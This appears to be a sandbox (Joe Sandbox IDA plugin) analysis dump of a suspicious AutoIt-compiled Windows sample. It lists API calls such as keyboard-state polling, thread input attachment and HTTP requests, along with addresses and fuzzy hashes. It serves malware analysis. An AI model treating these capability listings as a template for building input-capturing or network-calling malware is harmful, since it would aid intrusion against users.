                                      • API String ID: 429561992-0
                                      • Opcode ID: 0fb7dfc77e8ab61805d6762bf0fd9d3e99396ed4cc9a291bee6a0b21a6d553de
                                      • Instruction ID: e4abca37857fe76834ea6d23c4fc1ba0ef83148f690be9c8e6f3915e797d3acf
                                      • Opcode Fuzzy Hash: 0fb7dfc77e8ab61805d6762bf0fd9d3e99396ed4cc9a291bee6a0b21a6d553de
                                      • Instruction Fuzzy Hash: D9C123B16082059FD700DF68C88496BBBE9FF89744F14891DF98ADB290D731EE05CB52
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 008F7AF3
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008F7B8F
                                      • SHGetDesktopFolder.SHELL32(?), ref: 008F7BA3
                                      • CoCreateInstance.COMBASE(0091FD08,00000000,00000001,00946E6C,?), ref: 008F7BEF
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008F7C74
                                      • CoTaskMemFree.COMBASE(?), ref: 008F7CCC
                                      • SHBrowseForFolderW.SHELL32(?), ref: 008F7D57
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008F7D7A
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008F7D81
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008F7DD6
                                      • CoUninitialize.COMBASE ref: 008F7DDC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                      • String ID:
                                      • API String ID: 2762341140-0
                                      • Opcode ID: 9ff309b37e9329171cc889887c6f7d9dd593622793caceaa35fcdcc161569762
                                      • Instruction ID: a748b13d6aeed02e8ffc543aaa9cf8db1096004b13bcb5da931cf3eaf42e29c6
                                      • Opcode Fuzzy Hash: 9ff309b37e9329171cc889887c6f7d9dd593622793caceaa35fcdcc161569762
                                      • Instruction Fuzzy Hash: ADC11B75A04109AFDB14DFA8C884DAEBBF9FF48314B148499E919DB361D730EE45CB90
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00915504
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00915515
                                      • CharNextW.USER32(00000158), ref: 00915544
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00915585
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0091559B
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009155AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: d49d6bb25e05b1eb3ca707b69dc96a45684ed14a98166f6806cb8ac0c9498d96
                                      • Instruction ID: 6b4aad1f044ec730aba7b41aa493c753341e80670b9e7b134e0f9db71309f041
                                      • Opcode Fuzzy Hash: d49d6bb25e05b1eb3ca707b69dc96a45684ed14a98166f6806cb8ac0c9498d96
                                      • Instruction Fuzzy Hash: 7A61B170B0460DEFDF108F55CC84AFE7BB9EB89360F528545F525A62A0D7748AC0DB61
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008DFAAF
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 008DFB08
                                      • VariantInit.OLEAUT32(?), ref: 008DFB1A
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 008DFB3A
                                      • VariantCopy.OLEAUT32(?,?), ref: 008DFB8D
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 008DFBA1
                                      • VariantClear.OLEAUT32(?), ref: 008DFBB6
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 008DFBC3
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008DFBCC
                                      • VariantClear.OLEAUT32(?), ref: 008DFBDE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008DFBE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 008E9CA1
                                      • GetAsyncKeyState.USER32(000000A0), ref: 008E9D22
                                      • GetKeyState.USER32(000000A0), ref: 008E9D3D
                                      • GetAsyncKeyState.USER32(000000A1), ref: 008E9D57
                                      • GetKeyState.USER32(000000A1), ref: 008E9D6C
                                      • GetAsyncKeyState.USER32(00000011), ref: 008E9D84
                                      • GetKeyState.USER32(00000011), ref: 008E9D96
                                      • GetAsyncKeyState.USER32(00000012), ref: 008E9DAE
                                      • GetKeyState.USER32(00000012), ref: 008E9DC0
                                      • GetAsyncKeyState.USER32(0000005B), ref: 008E9DD8
                                      • GetKeyState.USER32(0000005B), ref: 008E9DEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      APIs
                                      • WSAStartup.WS2_32(00000101,?), ref: 009005BC
                                      • inet_addr.WS2_32(?), ref: 0090061C
                                      • gethostbyname.WS2_32(?), ref: 00900628
                                      • IcmpCreateFile.IPHLPAPI ref: 00900636
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009006C6
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009006E5
                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 009007B9
                                      • WSACleanup.WS2_32 ref: 009007BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 707087890-567219261
                                      APIs
                                      • CoInitialize.OLE32 ref: 00903774
                                      • CoUninitialize.COMBASE ref: 0090377F
                                      • CoCreateInstance.COMBASE(?,00000000,00000017,0091FB78,?), ref: 009037D9
                                      • IIDFromString.COMBASE(?,?), ref: 0090384C
                                      • VariantInit.OLEAUT32(?), ref: 009038E4
                                      • VariantClear.OLEAUT32(?), ref: 00903936
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 636576611-1287834457
                                      APIs
                                      • _wcslen.LIBCMT ref: 008EDC50
                                      • _wcsstr.LIBVCRUNTIME ref: 008EDCA0
                                      • 74D31560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008EDCBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: D31560_wcslen_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 2357346915-1459072770
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008F33CF
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008F33F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-3080491070
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 1256254125-769500911
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F53A0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008F5416
                                      • GetLastError.KERNEL32 ref: 008F5420
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 008F54A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      APIs
                                      • CreateMenu.USER32 ref: 00913C79
                                      • SetMenu.USER32(?,00000000), ref: 00913C88
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00913D10
                                      • IsMenu.USER32(?), ref: 00913D24
                                      • CreatePopupMenu.USER32 ref: 00913D2E
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00913D5B
                                      • DrawMenuBar.USER32 ref: 00913D63
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0$F
                                      • API String ID: 161812096-3044882817
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00913A9D
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00913AA0
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00913AC7
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00913AEA
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00913B62
                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00913BAC
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00913BC7
                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00913BE2
                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00913BF6
                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00913C13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 008EB151
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB165
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 008EB16C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB17B
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 008EB18D
                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB1A6
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB1B8
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB1FD
                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB212
                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008EA1E1,?,00000001), ref: 008EB21D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      APIs
                                      • _free.LIBCMT ref: 008B2C94
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008B2CA0
                                      • _free.LIBCMT ref: 008B2CAB
                                      • _free.LIBCMT ref: 008B2CB6
                                      • _free.LIBCMT ref: 008B2CC1
                                      • _free.LIBCMT ref: 008B2CCC
                                      • _free.LIBCMT ref: 008B2CD7
                                      • _free.LIBCMT ref: 008B2CE2
                                      • _free.LIBCMT ref: 008B2CED
                                      • _free.LIBCMT ref: 008B2CFB
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00881459
                                      • OleUninitialize.OLE32(?,00000000), ref: 008814F8
                                      • UnregisterHotKey.USER32(?), ref: 008816DD
                                      • DestroyWindow.USER32(?), ref: 008C24B9
                                      • FreeLibrary.KERNEL32(?), ref: 008C251E
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C254B
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00885C7A
                                        • Part of subcall function 00885D0A: GetClientRect.USER32(?,?), ref: 00885D30
                                        • Part of subcall function 00885D0A: GetWindowRect.USER32(?,?), ref: 00885D71
                                        • Part of subcall function 00885D0A: ScreenToClient.USER32(?,?), ref: 00885D99
                                      • GetDC.USER32 ref: 008C46F5
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008C4708
                                      • SelectObject.GDI32(00000000,00000000), ref: 008C4716
                                      • SelectObject.GDI32(00000000,00000000), ref: 008C472B
                                      • ReleaseDC.USER32(?,00000000), ref: 008C4733
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008C47C4
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      APIs
                                      • RtlDecodePointer.NTDLL(?), ref: 008BAFAB
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008F35E4
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • LoadStringW.USER32(00952390,?,00000FFF,?), ref: 008F360A
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008FC272
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008FC29A
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008FC2CA
                                      • GetLastError.KERNEL32 ref: 008FC322
                                      • SetEvent.KERNEL32(?), ref: 008FC336
                                      • InternetCloseHandle.WININET(00000000), ref: 008FC341
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008C3AAF,?,?,Bad directive syntax error,0091CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008E98BC
                                      • LoadStringW.USER32(00000000,?,008C3AAF,?), ref: 008E98C3
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008E9987
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      APIs
                                      • GetParent.USER32 ref: 008E20AB
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 008E20C0
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008E214D
                                      Similarity
                                      • API ID: ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      Similarity
                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                      • String ID:
                                      APIs
                                        • Part of subcall function 00898F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00898BE8,?,00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898FC5
                                      • DestroyWindow.USER32(?), ref: 00898C81
                                      • KillTimer.USER32(00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898D1B
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 008D6973
                                      • DeleteObject.GDI32(00000000), ref: 008D69E6
                                      Similarity
                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      APIs
                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008D6890
                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008D68A9
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008D68B9
                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008D68D1
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008D68F2
